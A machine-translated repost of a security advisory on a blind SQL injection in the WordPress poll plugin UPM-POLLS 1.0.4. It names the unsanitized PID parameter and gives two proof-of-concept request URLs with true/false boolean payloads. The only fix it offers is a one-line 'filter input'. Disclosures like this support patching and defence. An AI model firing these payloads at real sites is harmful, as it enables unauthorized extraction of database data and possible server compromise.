Wordpress plugin UPM-POLLS 1.0.4 blind note and repair

Previous Article: http://www.bkjia.com/Article/201108/99254.html

 

Title: blind SQL injection UPM-POLLS wordpress plugin 1.0.4

Author: Saif El-Sherei www.2cto.com

: Http://downloads.wordpress.org/plugin/upm-polls.1.0.4.zip

Affected Version: 1.0.4

Test Platform: wordpress 3.2.1, Firefox 4, XAMPP

 

Program Information:

 

Best Plugin to create Polls for your site. Everything is smoother, faster,

And seamless like WordPress itself.

 

Poll Manager,

Ability to set general and post/page specific polls,

Ability to leaf over the polls

Ability to add certain poll in certain post content

Ability to show polls either with and without current results

Polls

 

 

Diary:

 

The Variable PID is not properly sanitized in the get request before

Insertion into the database query; allowing an attaacker or any user who

Can view poll results (supposedly all user) to use blind SQL injection

Extract database data and possibly compromise the whole server. a POC is

Provided with both true and false results.

 

Test Example 1 (TRUE ):

 

Http://www.bkjia.com/wordpress/wp-admin/admin-ajax.php? Action = upm_ayax_polls_result & do = result & post = 1 & type = general & PID = 2and

1 = 1

 

"Poll results for poll 2 is displayed"

 

Test Example 2 (FALSE ):

 

Http://www.bkjia.com/wordpress/wp-admin/admin-ajax.php? Action = upm_ayax_polls_result & do = result & post = 1 & type = general & PID = 2and

1 = 2

 

"Blank page is displayed"

 

Www.2cto.com provides the repair solution:

 

Filter parameter input on this page